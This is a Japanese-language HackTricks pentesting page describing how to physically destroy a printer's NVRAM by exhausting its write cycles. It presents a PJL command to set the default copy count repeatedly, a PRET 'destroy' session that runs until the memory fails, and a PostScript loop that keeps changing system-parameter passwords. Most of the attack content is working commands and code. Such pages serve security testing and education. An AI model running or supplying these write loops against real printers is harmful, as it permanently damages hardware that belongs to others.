hacktricks/network-services-pentesting/pentesting-printers/physical-damage.md

4.9 KiB
Raw Blame History

htARTE (HackTricks AWS Red Team Expert)でゼロからヒーローまでのAWSハッキングを学ぶ

HackTricksをサポートする他の方法:

プリンターやその他の組み込みデバイスの長期設定は、非揮発性メモリ(NVRAM)に保存されており、これは伝統的にEEPROMまたはフラッシュメモリとして実装されています。これらのコンポーネントは限られた寿命を持っています。現在、フラッシュメモリのベンダーは、書き込みエラーが発生する前に約100,000回の書き換えを保証しています。

PJL

NVRAMの書き込み機能を破壊する実用的なテストとして、Xの異なる値でコピー数の長期値を連続して設定することができます:

@PJL DEFAULT COPIES=X

通常、NVRAMパラメータへの書き込みを停止する前に、工場出荷時のデフォルト値にパラメータが固定され、@PJL SET... コマンドを使用して現在の印刷ジョブのすべての変数を変更することができます。

PRETを使用して:

./pret.py -q printer pjl
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> destroy
Warning: This command tries to cause physical damage to the
printer NVRAM. Use at your own risk. Press CTRL+C to abort.
Starting NVRAM write cycle loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM!
Dave, stop. Stop, will you? Stop, Dave. Will you stop, Dave?
[... wait for about 24 hours ...]
I'm afraid. I'm afraid, Dave. Dave, my mind is going...
NVRAM died after 543894 cycles, 18:46:11

PostScript

PostScriptでは、再起動後も生き残るしたがって、何らかのNVRAMに保存されていなければならないcurrentsystemparams辞書内のエントリを見つける必要があります。良い候補はPostScriptパスワードです。
PostScriptは自身のNVRAMを破損させるスクリプトを実行できます

/counter 0 def
{ << /Password counter 16 string cvs
/SystemParamsPassword counter 1 add 16 string cvs
>> setsystemparams /counter counter 1 add def
} loop

これらの技術に関する詳細情報は http://hacking-printers.net/wiki/index.php/Physical_damage で見つけることができます。

htARTE (HackTricks AWS Red Team Expert) で AWSハッキングをゼロからヒーローまで学ぶ

HackTricksをサポートする他の方法: